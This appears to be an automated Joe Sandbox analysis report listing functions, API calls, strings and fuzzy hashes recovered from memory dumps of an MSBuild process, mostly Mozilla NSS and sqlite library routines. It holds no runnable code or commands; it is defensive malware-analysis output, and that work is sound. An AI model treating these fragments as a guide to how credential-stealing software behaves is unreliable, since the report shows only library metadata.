Part of subcall function 6CB91570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB91637

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: e9a594b057683f279e918b234e1ced27babf881c17d56e24749a93288a26737f
Instruction ID: 135e0505eca5c7d16e8d85575c0ffadb25365ea70ae29c341c0e5d6e8c17d484
Opcode Fuzzy Hash: e9a594b057683f279e918b234e1ced27babf881c17d56e24749a93288a26737f
Instruction Fuzzy Hash: C771F2B5A002859FDB04CFA5CC80A6EB7B8FF4A318F18863CE90997711E732D944DB91

Function 6CBB6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB61C6F,00000000,00000004,?,?), ref: 6CBB6C3F

Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CB61C6F,00000000,00000004,?,?), ref: 6CBB6C60
PR_ExplodeTime.NSS3(00000000,6CB61C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CB61C6F,00000000,00000004,?,?), ref: 6CBB6C94

Strings

gfff, xrefs: 6CBB6D66
gfff, xrefs: 6CBB6D30
gfff, xrefs: 6CBB6D9C
gfff, xrefs: 6CBB6CF5
gfff, xrefs: 6CBB6CFD

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 6a42dd2efcf14000f1581cf56f31cead977097f1e12308534c851d69ab11819b
Instruction ID: 69b73ebab00574968427062cf9af40ba17964497f0deb49786e80c1d87512304
Opcode Fuzzy Hash: 6a42dd2efcf14000f1581cf56f31cead977097f1e12308534c851d69ab11819b
Instruction Fuzzy Hash: 54513B72B015494FC70CCDADDC526EEB7DAABA4310F48C23AE442DB785DA38E906C751

Function 6CAFAEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6CC1CF46,?,6CAECDBD,?,6CC1BF31,?,?,?,?,?,?,?), ref: 6CAFB039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CC1CF46,?,6CAECDBD,?,6CC1BF31), ref: 6CAFB090
sqlite3_free.NSS3(?,?,?,?,?,?,6CC1CF46,?,6CAECDBD,?,6CC1BF31), ref: 6CAFB0A2
CloseHandle.KERNEL32(?,?,6CC1CF46,?,6CAECDBD,?,6CC1BF31,?,?,?,?,?,?,?,?,?), ref: 6CAFB100
sqlite3_free.NSS3(?,?,00000002,?,6CC1CF46,?,6CAECDBD,?,6CC1BF31,?,?,?,?,?,?,?), ref: 6CAFB115
sqlite3_free.NSS3(?,?,?,?,?,?,6CC1CF46,?,6CAECDBD,?,6CC1BF31), ref: 6CAFB12D

Part of subcall function 6CAE9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CAFC6FD,?,?,?,?,6CB4F965,00000000), ref: 6CAE9F0E
Part of subcall function 6CAE9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CB4F965,00000000), ref: 6CAE9F5D

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
Opcode ID: 406193ca3d80eab9459818e5fd518db1330d381f0a61c5813c0e17a55a47956d
Instruction ID: d6209ebdc474931436d53a4652175e5690c7880cd53f8ec2f1b6c84611b4c0ab
Opcode Fuzzy Hash: 406193ca3d80eab9459818e5fd518db1330d381f0a61c5813c0e17a55a47956d
Instruction Fuzzy Hash: 4B91D2B0A042058FEB04CF65D984ABBB7B2FF45304F18462DE42697A50EB34E9C6CB55

Function 6CC78D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CCC14E4,6CC2CC70), ref: 6CC78D47
PR_GetCurrentThread.NSS3 ref: 6CC78D98

Part of subcall function 6CB50F00: PR_GetPageSize.NSS3(6CB50936,FFFFE8AE,?,6CAE16B7,00000000,?,6CB50936,00000000,?,6CAE204A), ref: 6CB50F1B
Part of subcall function 6CB50F00: PR_NewLogModule.NSS3(clock,6CB50936,FFFFE8AE,?,6CAE16B7,00000000,?,6CB50936,00000000,?,6CAE204A), ref: 6CB50F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CC78E7B
htons.WSOCK32(?), ref: 6CC78EDB
PR_GetCurrentThread.NSS3 ref: 6CC78F99
PR_GetCurrentThread.NSS3 ref: 6CC7910A

Strings

%u.%u.%u.%u, xrefs: 6CC78E74

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 56ebc790527a5c8f244232a48839711b60684b2386c07c8f0a359aed675a64c4
Instruction ID: 9bfda1725f921e9470704bd8e62eb7fcce644fdaaffaec8972c226c61ec1e93a
Opcode Fuzzy Hash: 56ebc790527a5c8f244232a48839711b60684b2386c07c8f0a359aed675a64c4
Instruction Fuzzy Hash: 4F029A319052558FDB28CF1AC46876ABBB3EF42304F19C25AD8919FA91E335D949C7B0

Function 6CC1A480 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 235COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CC3C3A2,?,?,00000000,00000000), ref: 6CC1A528
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CC1A6E0
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC1A71B
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC1A738

Strings

database corruption, xrefs: 6CC1A6D4
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CC1A6CA
%s at line %d of [%.10s], xrefs: 6CC1A6D9

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 622669576-598938438
Opcode ID: de7d6351054053f37791993480390e299825194176d2dcfff9877f4c5eaae20d
Instruction ID: 251654f8e033c3d57ea3223660162585077a2c6fa8ab4fd95f78e12821faf7b9
Opcode Fuzzy Hash: de7d6351054053f37791993480390e299825194176d2dcfff9877f4c5eaae20d
Instruction Fuzzy Hash: 1291CE7160C7018BC715CF2AC490A5AB7E1BF88314F454A6DE8968BF91FB30EC89D782

Function 6CBF4540 Relevance: 12.2, APIs: 8, Instructions: 170COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CBF4571
memset.VCRUNTIME140(?,00000000,00000000), ref: 6CBF45B1
memcpy.VCRUNTIME140(?,?,00000020), ref: 6CBF45C2

Part of subcall function 6CBF04C0: WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6CBF461B,-00000004), ref: 6CBF04DF
Part of subcall function 6CBF04C0: PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6CBF461B,-00000004), ref: 6CBF0534

PR_Now.NSS3 ref: 6CBF4626

Part of subcall function 6CC29DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DC6
Part of subcall function 6CC29DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DD1
Part of subcall function 6CC29DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC29DED

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CBF4634
memcmp.VCRUNTIME140(?,?,?,00000000,?,000F4240,00000000), ref: 6CBF46C4
PR_SetError.NSS3(FFFFD05A,00000000,00000000,?,000F4240,00000000), ref: 6CBF46E3
PR_SetError.NSS3(?,00000000), ref: 6CBF4722

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: ErrorTime$SystemUnothrow_t@std@@@__ehfuncinfo$??2@$FileObjectSingleValueWaitmemcmpmemcpymemset
String ID:
API String ID: 1183590942-0
Opcode ID: 76b645fa3dccd9bed7a280ad49a60a0c83b58a44efe8d7bf84b5276f61600137
Instruction ID: ec96234aef7ea0a5b772d8a0c6a884b504d064840963e6a31fa66e936efa2beb
Opcode Fuzzy Hash: 76b645fa3dccd9bed7a280ad49a60a0c83b58a44efe8d7bf84b5276f61600137
Instruction Fuzzy Hash: A461E0B1E006449FEB20CF68D884B9AB7F1FF59308F554628E8959BB51E730E94ACB41

Function 6CB74420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 6CB74444
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CB74466

Part of subcall function 6CBC1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CB688A4,00000000,00000000), ref: 6CBC1228
Part of subcall function 6CBC1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CBC1238
Part of subcall function 6CBC1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CB688A4,00000000,00000000), ref: 6CBC124B
Part of subcall function 6CBC1200: PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0,00000000,00000000,00000000,?,6CB688A4,00000000,00000000), ref: 6CBC125D
Part of subcall function 6CBC1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CBC126F
Part of subcall function 6CBC1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CBC1280
Part of subcall function 6CBC1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CBC128E
Part of subcall function 6CBC1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CBC129A
Part of subcall function 6CBC1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CBC12A1

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB7447A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB7448A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB74494

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$Item_Zfree$ArenaCriticalFreePoolSectionfree$Arena_CallClearDeleteEnterOnceUnlockValuememset
String ID:
API String ID: 241050562-0
Opcode ID: a3ae3fb87dd8cb4c14d1b6b0540ecc046d9c139ad0a13206cae08d372c9f36bd
Instruction ID: ed443d74fb8a617447108128064877f59fcf5e583cb3ae7d472798b100883d39
Opcode Fuzzy Hash: a3ae3fb87dd8cb4c14d1b6b0540ecc046d9c139ad0a13206cae08d372c9f36bd
Instruction Fuzzy Hash: C711D5B6D007449BD7308F249C804ABB7F8FF59359B044B2EEC9D62A00F771B5988BA1

Function 6CC7CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC7D086
PR_Malloc.NSS3(00000001), ref: 6CC7D0B9
PR_Free.NSS3(?), ref: 6CC7D138

Strings

>, xrefs: 6CC7CF5B

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 75d0657a23ad901fc932507f8d7679fe296edc1411783eb6a4cd18a37b538425
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 8DD14762B4164B0BEB34487D8CA13EA7793D782374F684329D572DBBE5F61988838371

Function 6CC1AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16ca8837e2a46c8e3d091ba1c2fd3fc20b0152d0cd5aaead78503ec703d6247a
Instruction ID: c1762660f43ae43054477f68777f4e66066c8a43c816560d8029bd37f3e13693
Opcode Fuzzy Hash: 16ca8837e2a46c8e3d091ba1c2fd3fc20b0152d0cd5aaead78503ec703d6247a
Instruction Fuzzy Hash: E7F1FFB5E092568FDB04CFAED8503A977F0AB8A308F15426DC805D7B40F774AA56DBC4

Function 6CBF25B0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,6CBD5A85), ref: 6CBF2675
PK11_Encrypt.NSS3(?,00001081,00000000,?,?,00000010,?,00000010), ref: 6CBF2659

Part of subcall function 6CBA3850: TlsGetValue.KERNEL32 ref: 6CBA389F
Part of subcall function 6CBA3850: EnterCriticalSection.KERNEL32(?), ref: 6CBA38B3
Part of subcall function 6CBA3850: PR_Unlock.NSS3(?), ref: 6CBA38F1
Part of subcall function 6CBA3850: TlsGetValue.KERNEL32 ref: 6CBA390F
Part of subcall function 6CBA3850: EnterCriticalSection.KERNEL32(?), ref: 6CBA3923
Part of subcall function 6CBA3850: PR_Unlock.NSS3(?), ref: 6CBA3972

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBF2697
PK11_Encrypt.NSS3(?,?,?,?,00000000,6CBD5A85,?,6CBD5A85), ref: 6CBF2717

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CriticalEncryptEnterK11_SectionUnlockValue$Errormemcpy
String ID:
API String ID: 3114817199-0
Opcode ID: 51f00d101faa23014441d72748a9024489d4dac3f4a5a88eb3ee7be258839aa9
Instruction ID: 63635098f1ae45b338fc99aeb5e25d1a8613b381a970386fde3878629385f14c
Opcode Fuzzy Hash: 51f00d101faa23014441d72748a9024489d4dac3f4a5a88eb3ee7be258839aa9
Instruction Fuzzy Hash: 5841D771A083C07AFB258E59DC86FDF73A8DFD0714F104519E9A406741EA71998A87D3

Function 6CB56410 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

bind.WSOCK32(?,?,?,?,6CB56401,?,?,0000001C), ref: 6CB56422
WSAGetLastError.WSOCK32(?,?,?,?,6CB56401,?,?,0000001C), ref: 6CB56432

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: ErrorLastbind
String ID:
API String ID: 2328862993-0
Opcode ID: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction ID: 78421d4a953d97ef4f6249de3860ffca1d8b9c993dd0e5bd445327cafc79302f
Opcode Fuzzy Hash: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction Fuzzy Hash: 13E01D362501046FCF119F74DC058AA37A9DF08228790C554F529C7771F631D4658751

Function 6CB58EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64fdae48671cc3914f52dfb0bb7c9deafc6fddaae712b879a8de8e66e61ec9e2
Instruction ID: 16049c1d0ef2fb6053068bbf08ed4a079227d6f29af67cd0539ed1c1acae3563
Opcode Fuzzy Hash: 64fdae48671cc3914f52dfb0bb7c9deafc6fddaae712b879a8de8e66e61ec9e2
Instruction Fuzzy Hash: 6511EF32B512858BDB04CF25D884B5AB7B5FF46318F4446AAD8068FA41C376D8E6C7C2

Function 6CC30C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74e38f23f9b4f6bce7b55cf24bd9080a23b3ca76fc02b9760dc68cf7a8e95dac
Instruction ID: 8291ed59ae8e4be6ad8bce8e1e8ae9dcaf93573edc12bed80df634bf40a32dbd
Opcode Fuzzy Hash: 74e38f23f9b4f6bce7b55cf24bd9080a23b3ca76fc02b9760dc68cf7a8e95dac
Instruction Fuzzy Hash: 9711C175B043158FCB00DF19E88066A7BB2FFC5368F14806DD8198B701EB71E80ACBA1

Function 6CBA44C0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa8b15cb24748f850b3bcba605202029641eb9e2df93241f4a621a835d319a0e
Instruction ID: ece4fb4cd86c82cc33494d5842f7160fc32d136f4cf476bef46c3d3a833496ed
Opcode Fuzzy Hash: fa8b15cb24748f850b3bcba605202029641eb9e2df93241f4a621a835d319a0e
Instruction Fuzzy Hash: DA1105B6E002199F8B10CF99D8809EFBBF9EF8C664B554429ED19E7300D630ED118BE1

Function 6CBA4440 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
